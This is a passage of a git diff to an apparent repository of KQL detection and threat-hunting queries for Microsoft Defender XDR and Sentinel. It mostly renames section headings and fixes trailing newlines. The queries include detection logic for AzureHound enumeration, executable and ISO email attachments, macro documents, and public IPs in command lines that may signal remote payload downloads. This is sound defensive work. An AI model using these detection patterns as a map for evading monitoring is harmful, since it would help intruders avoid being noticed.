Endpoint +## Defender XDR ```KQL search in(CloudAppEvents) 'Microsoft365Defender' | where Timestamp > ago(180d) // How far back to check diff --git a/Defender XDR/DeviceIsolation.md b/Defender XDR/DeviceIsolation.md index 85ac0bf..1b38402 100644 --- a/Defender XDR/DeviceIsolation.md +++ b/Defender XDR/DeviceIsolation.md @@ -9,7 +9,7 @@ This query lists all the device isolation activities that have been performed by - https://learn.microsoft.com/en-us/defender-endpoint/respond-machine-alerts - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) @@ -26,4 +26,4 @@ CloudAppEvents | extend IsolatedDevice = tostring(parse_json(RawEventData).DeviceName), IsolationComment = tostring(parse_json(RawEventData).ActionComment), IsolationScope = tostring(parse_json(RawEventData).ActionScope) | project-rename InitiatedByAccountName = AccountDisplayName, InitiatedByAccounttId = AccountId |project-reorder TimeGenerated, IsolatedDevice, IsolationComment, IsolationScope, InitiatedByAccountName, InitiatedByAccounttId -``` \ No newline at end of file +``` diff --git a/Defender XDR/DeviceRemovedFromIsolation.md b/Defender XDR/DeviceRemovedFromIsolation.md index 76eb885..16def5a 100644 --- a/Defender XDR/DeviceRemovedFromIsolation.md +++ b/Defender XDR/DeviceRemovedFromIsolation.md @@ -9,7 +9,7 @@ This query lists all the devices that are removed from isolation activities that - https://learn.microsoft.com/en-us/defender-endpoint/respond-machine-alerts - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) @@ -40,4 +40,4 @@ CloudAppEvents | project-rename IsolationInitiatedByAccountName = AccountDisplayName, IsoaltionInitiatedByAccounttId = AccountId, IsolationTime = TimeGenerated | project IsolationTime, IsolatedDevice, IsolationComment, IsolationScope, IsolationInitiatedByAccountName, IsoaltionInitiatedByAccounttId) on $left.ReleasedDevice == $right.IsolatedDevice |project-reorder TimeGenerated, ReleasedDevice, ReleaseComment, InitiatedByAccountName, InitiatedByAccounttId, IsolationTime, IsolationComment, IsolationScope, IsolationInitiatedByAccountName, IsoaltionInitiatedByAccounttId -``` \ No newline at end of file +``` diff --git a/Defender XDR/LiveResponseFileCollection.md b/Defender XDR/LiveResponseFileCollection.md index 0b3845b..113b44a 100644 --- a/Defender XDR/LiveResponseFileCollection.md +++ b/Defender XDR/LiveResponseFileCollection.md @@ -11,7 +11,7 @@ This query lists all the Getfile activities that have been executed. This includ - https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-fileprofile-function - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) @@ -30,4 +30,4 @@ CloudAppEvents | project-rename InitiatedByAccountName = AccountDisplayName, InitiatedByAccounttId = AccountId, SHA256 = FileSHA256 | invoke FileProfile(SHA256, 1000) | project-reorder TimeGenerated, FileName, SHA256, InitiatedByAccountName, InitiatedByAccounttId, GlobalPrevalence, SignatureState -``` \ No newline at end of file +``` diff --git a/Defender XDR/LiveResponseUnsignedPowerShellChanges.md b/Defender XDR/LiveResponseUnsignedPowerShellChanges.md index 0e02a25..bcf4da2 100644 --- a/Defender XDR/LiveResponseUnsignedPowerShellChanges.md +++ b/Defender XDR/LiveResponseUnsignedPowerShellChanges.md @@ -11,7 +11,7 @@ This query lists all changes to the Live Response Unsigned Script settings in th - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where ActionType == "SetAdvancedFeatures" @@ -26,4 +26,4 @@ CloudAppEvents | extend SettingName = tostring(parse_json(RawEventData).SettingName), SettingsNewValue = tostring(parse_json(RawEventData).SettingsNewValue) | where SettingName == "Live Response unsigned script execution" | project-reorder TimeGenerated, AccountId, ActionType, SettingName, SettingsNewValue -``` \ No newline at end of file +``` diff --git a/Defender XDR/ManualAntivirusScans.md b/Defender XDR/ManualAntivirusScans.md index 5723276..f4c30e8 100644 --- a/Defender XDR/ManualAntivirusScans.md +++ b/Defender XDR/ManualAntivirusScans.md @@ -9,7 +9,7 @@ This query lists all manual (and playbook related) anvitius actions that are ini - https://learn.microsoft.com/en-us/defender-endpoint/mdav-scan-best-practices - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where ActionType == "RunAntiVirusScan" @@ -22,4 +22,4 @@ CloudAppEvents | where ActionType == "RunAntiVirusScan" | extend DeviceName = tostring(parse_json(RawEventData).DeviceName), ActionComment = tostring(parse_json(RawEventData).ActionComment), ActionScope = tostring(parse_json(RawEventData).ActionScope) | summarize TotalAntivirusScans = count(), ScanTypes = make_set(ActionScope), Comments = make_set(ActionComment) by DeviceName -``` \ No newline at end of file +``` diff --git a/Defender XDR/OffboardingPackageDownloaded.md b/Defender XDR/OffboardingPackageDownloaded.md index 64eb061..e9d8031 100644 --- a/Defender XDR/OffboardingPackageDownloaded.md +++ b/Defender XDR/OffboardingPackageDownloaded.md @@ -18,7 +18,7 @@ An actor has gotten access to an account that is able to download an Defender Fo - https://learn.microsoft.com/en-us/defender-endpoint/offboard-machines - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where ActionType == "DownloadOffboardingPkg" @@ -33,4 +33,4 @@ CloudAppEvents | extend UserId = tostring(parse_json(RawEventData).UserId), ClientIP = tostring(parse_json(RawEventData).ClientIP) | project-rename InitiatedByAccountName = AccountDisplayName, InitiatedByAccounttId = AccountId | project-reorder TimeGenerated, InitiatedByAccountName, UserId, ClientIP, ActionType -``` \ No newline at end of file +``` diff --git a/Defender XDR/RBACChanges.md b/Defender XDR/RBACChanges.md index 473d1df..b346f0c 100644 --- a/Defender XDR/RBACChanges.md +++ b/Defender XDR/RBACChanges.md @@ -10,7 +10,7 @@ The query below can be used to monitor RBAC changes in Defender XDR. This query - https://learn.microsoft.com/en-us/defender-endpoint/rbac - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | extend Workload = tostring(parse_json(RawEventData).Workload) @@ -27,4 +27,4 @@ CloudAppEvents | where ActionType endswith "Role" | extend RoleName = tostring(parse_json(RawEventData).RoleName), RolePermissions = tostring(parse_json(RawEventData).RolePermissions), AssignedGroups = tostring(parse_json(RawEventData).AssignedGroups) | project-reorder TimeGenerated, ActionType, AccountObjectId, RoleName, RolePermissions, AssignedGroups -``` \ No newline at end of file +``` diff --git a/DetectionTemplate.md b/DetectionTemplate.md index 13e3d72..b306b10 100644 --- a/DetectionTemplate.md +++ b/DetectionTemplate.md @@ -39,4 +39,4 @@ DeviceProcessEvents // Paste your query here DeviceProcessEvents | where FileName == "Example.File" -``` \ No newline at end of file +``` diff --git a/Exposure Management/MostPermissiveEntities.md b/Exposure Management/MostPermissiveEntities.md index 8947155..8bcb47d 100644 --- a/Exposure Management/MostPermissiveEntities.md +++ b/Exposure Management/MostPermissiveEntities.md @@ -8,7 +8,7 @@ This query lists the top 100 entities that have the most permissions to perform #### References - https://learn.microsoft.com/en-us/security-exposure-management/microsoft-security-exposure-management -## Defender For Endpoint +## Defender XDR ```KQL // Permission Statistics ExposureGraphEdges @@ -19,4 +19,4 @@ ExposureGraphEdges | sort by TotalPermissions, SourceNodeName | project SourceNodeName, TotalPermissions, PermissionTypeCount, ResourceList, PermissionTypes | top 100 by TotalPermissions -``` \ No newline at end of file +``` diff --git a/Fun/KQLQueryVisits.md b/Fun/KQLQueryVisits.md index 54df1b9..33e2de3 100644 --- a/Fun/KQLQueryVisits.md +++ b/Fun/KQLQueryVisits.md @@ -8,7 +8,7 @@ Visualize the visits to [KQLQuery.com](KQLQuery.com) in a columnchart. #### References - https://www.KQLQuery.com/ -## Defender For Endpoint +## Defender XDR ```KQL DeviceNetworkEvents | where RemoteUrl has "kqlquery.com" @@ -21,4 +21,4 @@ DeviceNetworkEvents | where RemoteUrl has "kqlquery.com" | summarize TotalDevices = dcount(DeviceId) by bin(TimeGenerated, 1d) | render columnchart with(title="kqlquery.com visits", xtitle="Date", ytitle="TotalDevices") -``` \ No newline at end of file +``` diff --git a/Fun/KQLSearchVisits.md b/Fun/KQLSearchVisits.md index dd73d2a..286dfe3 100644 --- a/Fun/KQLSearchVisits.md +++ b/Fun/KQLSearchVisits.md @@ -8,7 +8,7 @@ Visualize the visits to [kqlsearch.com](kqlsearch.com) in a columnchart. #### References - https://www.kqlsearch.com/ -## Defender For Endpoint +## Defender XDR ```KQL DeviceNetworkEvents | where RemoteUrl has "kqlsearch.com" @@ -21,4 +21,4 @@ DeviceNetworkEvents | where RemoteUrl has "kqlsearch.com" | summarize TotalDevices = dcount(DeviceId) by bin(TimeGenerated, 1d) | render columnchart with(title="KQLSearch.com visits", xtitle="Date", ytitle="TotalDevices") -``` \ No newline at end of file +``` diff --git a/Fun/MailItemsAccessed.md b/Fun/MailItemsAccessed.md index 856a7d8..d716ccc 100644 --- a/Fun/MailItemsAccessed.md +++ b/Fun/MailItemsAccessed.md @@ -9,4 +9,4 @@ union OfficeActivity, CloudAppEvents | where Operation == "MailItemsAccessed" | summarize TotalEvents = count(), TotalCloudAppsEvents = countif(Type == "CloudAppEvents"), TotalUALEvents = countif(Type == "OfficeActivity") by bin(TimeGenerated, 1d) | extend EqualLogs = iff(TotalCloudAppsEvents == TotalUALEvents, true, false) -``` \ No newline at end of file +``` diff --git a/Fun/TeamsEmojiReactions.md b/Fun/TeamsEmojiReactions.md index e3034db..1ec19c6 100644 --- a/Fun/TeamsEmojiReactions.md +++ b/Fun/TeamsEmojiReactions.md @@ -5,7 +5,7 @@ #### Description This query lists the statistics of the Emoji reactions that have been send via Microsoft Teams -## Defender For Endpoint +## Defender XDR ```KQL CloudAppEvents | where Application == "Microsoft Teams" @@ -24,4 +24,4 @@ CloudAppEvents | where isnotempty(Emoji) | summarize TotalUsage = count() by Emoji | sort by TotalUsage -``` \ No newline at end of file +``` diff --git a/Fun/TeamsEmojiReactionsByDepartment.md b/Fun/TeamsEmojiReactionsByDepartment.md index 59a25fa..3edfdca 100644 --- a/Fun/TeamsEmojiReactionsByDepartment.md +++ b/Fun/TeamsEmojiReactionsByDepartment.md @@ -5,7 +5,7 @@ #### Description This query lists the statistics of the Emoji reactions that have been send via Microsoft Teams for each Department. -## Defender For Endpoint +## Defender XDR ```KQL CloudAppEvents | where Application == "Microsoft Teams" @@ -36,4 +36,4 @@ CloudAppEvents on $left.AccountObjectId == $right.AccountObjectId | project Department, Emoji | evaluate pivot(Department) // If you want to have the Departments on the y axis use | evaluate pivot(Emoji) -``` \ No newline at end of file +``` diff --git a/Functions/CollectIncidentStatistics.md b/Functions/CollectIncidentStatistics.md index 75adac7..8637dc4 100644 --- a/Functions/CollectIncidentStatistics.md +++ b/Functions/CollectIncidentStatistics.md @@ -5,7 +5,7 @@ #### Description This function returns the severity statistics of Sentinel or XDR. -## Defender For Endpoint +## Defender XDR ``` let CollectIncidentStatistics = (TimeSpan: timespan) { AlertInfo diff --git a/Functions/DeviceCommandLinePublicIPs.md b/Functions/DeviceCommandLinePublicIPs.md index 21e90c3..a3b846f 100644 --- a/Functions/DeviceCommandLinePublicIPs.md +++ b/Functions/DeviceCommandLinePublicIPs.md @@ -10,7 +10,7 @@ This function returns all public IPv4 addresses that have been seen on the comma - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ - https://andreafortuna.org/2017/11/27/how-a-malware-can-download-a-remote-payload-and-execute-malicious-code-in-one-line/ -## Defender For Endpoint +## Defender XDR ``` let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; // Returns all commandlines that contain a public IP addres from a specific device @@ -41,4 +41,4 @@ DeviceProcessEvents }; // Example DeviceCommandLinePublicIPs("devicename.tld", false) -``` \ No newline at end of file +``` diff --git a/Functions/IsDomainController.md b/Functions/IsDomainController.md index a54c1e0..2b2da04 100644 --- a/Functions/IsDomainController.md +++ b/Functions/IsDomainController.md @@ -9,7 +9,7 @@ This function validates if a device is a Domain Controller. It will return true - https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/functions/user-defined-functions - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-custom-functions?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` // This function validates if a device is a Domain Controller. It will return true when it is a domain controller, alternatively false is returned. let IsDeviceDomainController = (DeviceNameInput: string) { diff --git a/Functions/LastPowerShellExecutions.md b/Functions/LastPowerShellExecutions.md index d48267b..4f792da 100644 --- a/Functions/LastPowerShellExecutions.md +++ b/Functions/LastPowerShellExecutions.md @@ -10,7 +10,7 @@ This function returns the last x amount of powershell executions that have been - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-custom-functions?view=o365-worldwide - https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/scalar-data-types/timespan -## Defender For Endpoint +## Defender XDR ``` // Returns the last x amount of powershell executions based on a device and the timespan. Timespan examples can be seen in https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/scalar-data-types/timespan let LastPowerShellExecutions = (DeviceNameInput: string, Results: int, TimeFrame: timespan) { diff --git a/Functions/ListAllActionsAndOperations.md b/Functions/ListAllActionsAndOperations.md index c10c604..9beadd0 100644 --- a/Functions/ListAllActionsAndOperations.md +++ b/Functions/ListAllActionsAndOperations.md @@ -35,4 +35,4 @@ union * }; // Example ListAllActionsAndOperations -``` \ No newline at end of file +``` diff --git a/Functions/ListCISAExploitedVulnerabilites.md b/Functions/ListCISAExploitedVulnerabilites.md index 20008a5..a16c68e 100644 --- a/Functions/ListCISAExploitedVulnerabilites.md +++ b/Functions/ListCISAExploitedVulnerabilites.md @@ -9,7 +9,7 @@ This function lists all Known Exploited Vulnerabilities as classified by CISA. T - https://www.cisa.gov/known-exploited-vulnerabilities-catalog - https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv -## Defender For Endpoint +## Defender XDR ``` let ListCISAExploitedVulnerabilites = (StartYear:long) { let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, shortDescription: string, requiredAction: string, dueDate: datetime, notes: string)[@"https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv"] with (format="csv", ignoreFirstRecord=True); @@ -32,4 +32,4 @@ let ListCISAExploitedVulnerabilites = (StartYear:long) { }; // Example only list from 2023 or newer ListCISAExploitedVulnerabilites(2023); -``` \ No newline at end of file +``` diff --git a/Functions/ListDomainControllers.md b/Functions/ListDomainControllers.md index 8c5eabd..d9e7ff9 100644 --- a/Functions/ListDomainControllers.md +++ b/Functions/ListDomainControllers.md @@ -9,7 +9,7 @@ This function list all the domain controllers in your environment. Which might b - https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/functions/user-defined-functions - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-custom-functions?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` // This function list all domain controllers that have been active in the last 7 days. let ListDomainControllers = diff --git a/Functions/UserRiskStatus.md b/Functions/UserRiskStatus.md index eeb3c7a..615d8b4 100644 --- a/Functions/UserRiskStatus.md +++ b/Functions/UserRiskStatus.md @@ -10,7 +10,7 @@ This function returns the RiskState of a UPN, if the results are empty then the - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-custom-functions?view=o365-worldwide - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/howto-export-risk-data -## Defender For Endpoint +## Defender XDR ``` // Function returns the RiskState of a UPN, if the results are empty then the user did not have a risky state in the last 90 days. let UserRiskStatus = (UPN: string) { diff --git a/Graph API/AppEnrichmentAADNonInteractiveUserSignInLogs.md b/Graph API/AppEnrichmentAADNonInteractiveUserSignInLogs.md index e61fb8a..159ff33 100644 --- a/Graph API/AppEnrichmentAADNonInteractiveUserSignInLogs.md +++ b/Graph API/AppEnrichmentAADNonInteractiveUserSignInLogs.md @@ -22,4 +22,4 @@ MicrosoftGraphActivityLogs // Your filter here | lookup kind=leftouter ApplicationName on $left.AppId == $right.ResourceIdentity | project-reorder AppId, ApplicationName -``` \ No newline at end of file +``` diff --git a/Graph API/AppEnrichmentExternalData.md b/Graph API/AppEnrichmentExternalData.md index 68f922d..73cfa8a 100644 --- a/Graph API/AppEnrichmentExternalData.md +++ b/Graph API/AppEnrichmentExternalData.md @@ -18,4 +18,4 @@ MicrosoftGraphActivityLogs | take 1000 | lookup kind=leftouter ApplicationInformation on $left.AppId == $right.AppId | project-reorder AppId, ApplicationName -``` \ No newline at end of file +``` diff --git a/Graph API/AzureHound.md b/Graph API/AzureHound.md index b266e55..c9e2f6e 100644 --- a/Graph API/AzureHound.md +++ b/Graph API/AzureHound.md @@ -39,4 +39,4 @@ MicrosoftGraphActivityLogs | where not(ObjectId in (WhitelistedObjects)) | summarize TotalResponseSize = sum(ResponseSizeBytes), UniqueRequests = dcount(RequestId), Requests = make_set(RequestUri, 1000), Paths = make_set(GraphAPIPath), Resources = make_set(GraphAPIResource), UniqueResourceCount = dcount(GraphAPIResource) by UserId, bin(TimeGenerated, 1h), UserAgent, ObjectId | where UniqueRequests >= UniqueRequestThreshold and TotalResponseSize >= TotalResponseSizeTHreshold and UniqueResourceCount >= ResourceThreshold -``` \ No newline at end of file +``` diff --git a/Graph API/GraphResourceAPIRequestStats.md b/Graph API/GraphResourceAPIRequestStats.md index 347c73c..cfc5fcb 100644 --- a/Graph API/GraphResourceAPIRequestStats.md +++ b/Graph API/GraphResourceAPIRequestStats.md @@ -35,4 +35,4 @@ MicrosoftGraphActivityLogs | extend GraphAPIResource = tostring(split(GraphAPIPath, "/")[2]) | summarize TotalRequest = count() by GraphAPIResource | sort by TotalRequest -``` \ No newline at end of file +``` diff --git a/Graph API/GraphURIAPIRequestStats.md b/Graph API/GraphURIAPIRequestStats.md index eda642e..d9762ed 100644 --- a/Graph API/GraphURIAPIRequestStats.md +++ b/Graph API/GraphURIAPIRequestStats.md @@ -14,4 +14,4 @@ MicrosoftGraphActivityLogs | extend ParsedUri = tostring(parse_url(RequestUri).Path) | summarize TotalRequest = count() by ParsedUri | sort by TotalRequest -``` \ No newline at end of file +``` diff --git a/Graph API/IPEnrichment.md b/Graph API/IPEnrichment.md index e692c5a..9112150 100644 --- a/Graph API/IPEnrichment.md +++ b/Graph API/IPEnrichment.md @@ -14,4 +14,4 @@ MicrosoftGraphActivityLogs | extend GeoIPInfo = geo_info_from_ip_address(IPAddress) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city), latitude = tostring(parse_json(GeoIPInfo).latitude), longitude = tostring(parse_json(GeoIPInfo).longitude) | project-reorder IPAddress, country, state, RequestUri -``` \ No newline at end of file +``` diff --git a/Graph API/UserEnrichment.md b/Graph API/UserEnrichment.md index c7623c7..5b885e3 100644 --- a/Graph API/UserEnrichment.md +++ b/Graph API/UserEnrichment.md @@ -20,4 +20,4 @@ MicrosoftGraphActivityLogs | project AccountObjectId, AccountDisplayName, AccountUPN) on $left.UserId == $right.AccountObjectId | project-reorder AccountDisplayName, AccountUPN, RequestMethod, RequestUri -``` \ No newline at end of file +``` diff --git a/KQL Regex/RegexExamples.md b/KQL Regex/RegexExamples.md index 21871d4..0a62100 100644 --- a/KQL Regex/RegexExamples.md +++ b/KQL Regex/RegexExamples.md @@ -103,4 +103,4 @@ Example query: [List Role Additions (Line 6)](../Azure%20Active%20Directory/ADRo ``` let MD5Regex = '[a-f0-9]{32}'; ``` -Example query: [AbuseCH MD5 Malware Hash](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/blob/main/Threat%20Hunting/AbuseCHMD5Malware.md) \ No newline at end of file +Example query: [AbuseCH MD5 Malware Hash](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/blob/main/Threat%20Hunting/AbuseCHMD5Malware.md) diff --git a/Log Analytics/LogAnalyticsQueryStatistics.md b/Log Analytics/LogAnalyticsQueryStatistics.md index b7aece8..311a166 100644 --- a/Log Analytics/LogAnalyticsQueryStatistics.md +++ b/Log Analytics/LogAnalyticsQueryStatistics.md @@ -14,4 +14,4 @@ To audit the query executions the Azure Diagnostics settings for the Log Analyti LAQueryLogs | summarize UnqiueQueryCount = dcount(QueryText), TotalQueriesExecuted = count() by AADEmail | sort by AADEmail -``` \ No newline at end of file +``` diff --git a/MISP/MISP Feed Implementation Status/README.md b/MISP/MISP Feed Implementation Status/README.md index 29694e7..2a1c491 100644 --- a/MISP/MISP Feed Implementation Status/README.md +++ b/MISP/MISP Feed Implementation Status/README.md @@ -77,4 +77,4 @@ Some feeds that are mentioned on [MISPs Feed page](https://www.misp-project.org/ | [This list contains all optional domains - An additional list for administrators](https://gitlab.com/ZeroDot1/CoinBlockerLists/raw/master/list_optional.txt?inline=false) | ZeroDot1 - CoinBlockerLists | Read from IStreamSource failed | | [Tor exit nodes](https://www.dan.me.uk/torlist/?exit) | dan.me.uk | Data is shared in the ALL Nodes feed, otherwise double data is used | | [VXvault - URL List](http://vxvault.net/URL_List.php) | VXvault | Externaldata(), does not support this datatype.| -| [OpenPhish url list](https://openphish.com/feed.txt) | openphish.com | Partial query failure: Unable to perform requested operation. (message: 'Error with persistent storage path 'https://openphish.com/feed.txt' (operation 'CreateFileRef'). | \ No newline at end of file +| [OpenPhish url list](https://openphish.com/feed.txt) | openphish.com | Partial query failure: Unable to perform requested operation. (message: 'Error with persistent storage path 'https://openphish.com/feed.txt' (operation 'CreateFileRef'). | diff --git a/MISP/README.md b/MISP/README.md index cdd09dd..b589b6a 100644 --- a/MISP/README.md +++ b/MISP/README.md @@ -39,7 +39,7 @@ Sentinel and Defender For Endpoint can use different tables. In Defender For End - DeviceNetworkEvents - DeviceFileEvents -## Defender For Endpoint +## Defender XDR - DeviceNetworkEvents - DeviceFileEvents @@ -54,4 +54,4 @@ There are other MISP implementations available for Sentinel, however, in those c - https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/integrating-open-source-threat-feeds-with-misp-and-sentinel/ba-p/1350371 - https://www.inspark.nl/misp-threat-intelligence-azure-sentinel/ - https://www.linkedin.com/pulse/how-ingest-misp-iocs-azure-sentinel-using-security-arshad/ -- https://github.com/zolderio/misp-to-sentinel \ No newline at end of file +- https://github.com/zolderio/misp-to-sentinel diff --git a/Office 365/AnomalousAmountofURLClickEvents.md b/Office 365/AnomalousAmountofURLClickEvents.md index 2a7046a..7a248cf 100644 --- a/Office 365/AnomalousAmountofURLClickEvents.md +++ b/Office 365/AnomalousAmountofURLClickEvents.md @@ -29,7 +29,7 @@ A user has clicked and opened a malicious link. - **Github: https://github.com/guys1444** - **LinkedIn: https://www.linkedin.com/in/guy-sukerman-2002451aa/** -### Defender For Endpoint +### Defender XDR ``` let startDate = ago(30d); let endDate = now(); diff --git a/Office 365/Email - ASRExecutableContentTriggered.md b/Office 365/Email - ASRExecutableContentTriggered.md index b1c000c..f8097c0 100644 --- a/Office 365/Email - ASRExecutableContentTriggered.md +++ b/Office 365/Email - ASRExecutableContentTriggered.md @@ -23,7 +23,7 @@ If this rule is on block mode the action is blocked, if the rul is on audit mode - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide - https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/ -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType in ("AsrExecutableEmailContentBlocked", "AsrExecutableEmailContentAudited") @@ -50,4 +50,4 @@ DeviceEvents | project SenderFromAddress, Subject, NetworkMessageId) on $left.NetworkMessageId == $right.NetworkMessageId | project-reorder SenderFromAddress, Subject, FileName, FileSize, SHA256 -``` \ No newline at end of file +``` diff --git a/Office 365/Email - ExecutableFileRecieved.md b/Office 365/Email - ExecutableFileRecieved.md index f0aecd6..2f16f0e 100644 --- a/Office 365/Email - ExecutableFileRecieved.md +++ b/Office 365/Email - ExecutableFileRecieved.md @@ -19,7 +19,7 @@ An actor gains initial access via a attachment that is send to a mailbox, which - https://support.microsoft.com/en-us/topic/outlook-blocked-access-to-the-following-potentially-unsafe-attachments-c5c4a480-041e-2466-667f-e98d389ff822 - https://www.bleepingcomputer.com/news/security/the-most-common-malicious-email-attachments-infecting-windows/ -## Defender For Endpoint +## Defender XDR ``` let ExecutableFileExtentions = dynamic(['bat', 'cmd', 'com', 'cpl', 'dll', 'ex', 'exe', 'jse', 'lnk','msc', 'ps1', 'reg', 'vb', 'vbe', 'ws', 'wsf']); EmailEvents diff --git a/Office 365/Email - ISOAttachmentRecieved.md b/Office 365/Email - ISOAttachmentRecieved.md index d73da55..7fce19f 100644 --- a/Office 365/Email - ISOAttachmentRecieved.md +++ b/Office 365/Email - ISOAttachmentRecieved.md @@ -15,7 +15,7 @@ A user opens the ISO file that contains malware and grants the adversery initial - https://www.trendmicro.com/vinfo/it/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore - https://support.microsoft.com/en-us/office/blocked-attachments-in-outlook-434752e1-02d3-4e90-9124-8b81e49a8519 -## Defender For Endpoint +## Defender XDR ``` EmailEvents | where EmailDirection == 'Inbound' @@ -51,4 +51,4 @@ EmailEvents FileType, ThreatNames | where FileName endswith ".iso" -``` \ No newline at end of file +``` diff --git a/Office 365/Email - MacroAttachmentOpenedFromRareSender.md b/Office 365/Email - MacroAttachmentOpenedFromRareSender.md index 946bca4..59273f7 100644 --- a/Office 365/Email - MacroAttachmentOpenedFromRareSender.md +++ b/Office 365/Email - MacroAttachmentOpenedFromRareSender.md @@ -28,7 +28,7 @@ A actor uses a macro file to gain initial access in the network. This macro must - https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/ - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ -## Defender For Endpoint +## Defender XDR ``` // Adjust the threshold based on your organisation. let RareSenderThreshold = 10; @@ -119,4 +119,4 @@ DeviceFileEvents // Only search for inbound mail | where EmailDirection == 'Inbound' | summarize ['Targeted Mailboxes'] = make_set(RecipientEmailAddress) by SHA256, TotalDevices, tostring(FileLocations), Subject, SenderFromAddress -``` \ No newline at end of file +``` diff --git a/Office 365/Email - MostRareFileExtensionsRecieved.md b/Office 365/Email - MostRareFileExtensionsRecieved.md index bf69528..ad430e4 100644 --- a/Office 365/Email - MostRareFileExtensionsRecieved.md +++ b/Office 365/Email - MostRareFileExtensionsRecieved.md @@ -8,7 +8,7 @@ This query list the 20 rarest file extentions that have been used in email attac #### Risk Rare file extensions may incidacte that an actor is trying trick users in opening malicious files. -## Defender For Endpoint +## Defender XDR ``` EmailEvents // Only display inbound emails @@ -33,4 +33,4 @@ EmailEvents | where isnotempty(FileExtension) | summarize Total = count() by FileExtension | top 20 by Total asc -``` \ No newline at end of file +``` diff --git a/Office 365/Email - PotentialPhishingCampaign.md b/Office 365/Email - PotentialPhishingCampaign.md index d8714fe..217e669 100644 --- a/Office 365/Email - PotentialPhishingCampaign.md +++ b/Office 365/Email - PotentialPhishingCampaign.md @@ -19,7 +19,7 @@ A phishing campaign using different email addresses is targetting your organisat #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailevents-table?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL let RareDomainThreshold = 20; let TotalSenderThreshold = 1; @@ -52,4 +52,4 @@ EmailEvents | summarize Subjects = make_set(Subject), Senders = make_set(SenderFromAddress) by EmailClusterId | extend TotalSenders = array_length(Senders) | where TotalSenders >= TotalSenderThreshold -``` \ No newline at end of file +``` diff --git a/Office 365/Email - SafeLinksTrigger.md b/Office 365/Email - SafeLinksTrigger.md index f117818..0f6bc6d 100644 --- a/Office 365/Email - SafeLinksTrigger.md +++ b/Office 365/Email - SafeLinksTrigger.md @@ -20,7 +20,7 @@ A phishing campaign has started and a user has clicked the url, the URL is block #### References - https://learn.microsoft.com/en-us/microsoft-365/security/office-365-security/safe-links-about?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` UrlClickEvents | where ActionType == 'ClickBlocked' @@ -39,4 +39,4 @@ UrlClickEvents // join the email events | join kind=leftouter (EmailEvents | project NetworkMessageId, Subject, SenderFromAddress) on NetworkMessageId | project TimeGenerated, AccountUpn, Product = Workload, Url, ThreatTypes, Subject, SenderFromAddress, UrlChain -``` \ No newline at end of file +``` diff --git a/Office 365/ListSafeLinkEvents.md b/Office 365/ListSafeLinkEvents.md index 5c80b90..2cd8e9d 100644 --- a/Office 365/ListSafeLinkEvents.md +++ b/Office 365/ListSafeLinkEvents.md @@ -13,7 +13,7 @@ A phishing campaign has started and a user has clicked the url, the URL is block #### References - https://learn.microsoft.com/en-us/microsoft-365/security/office-365-security/safe-links-about?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` UrlClickEvents | where ActionType == "ClickBlocked" diff --git a/Office 365/Visualization - Email - MalwareDetectionReasons.md b/Office 365/Visualization - Email - MalwareDetectionReasons.md index ba12b8c..e89e732 100644 --- a/Office 365/Visualization - Email - MalwareDetectionReasons.md +++ b/Office 365/Visualization - Email - MalwareDetectionReasons.md @@ -8,7 +8,7 @@ This query visualizes the malware detection reasons in a piechart. This is based #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailpostdeliveryevents-table?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL EmailPostDeliveryEvents | where ThreatTypes == "Malware" @@ -23,4 +23,4 @@ EmailPostDeliveryEvents | extend DetectionMethod = tostring(extract(@'Malware":\["(.*?)"]', 1, DetectionMethods)) | summarize TotalEvents = count() by DetectionMethod | render piechart with(title="Malware Detection Reason 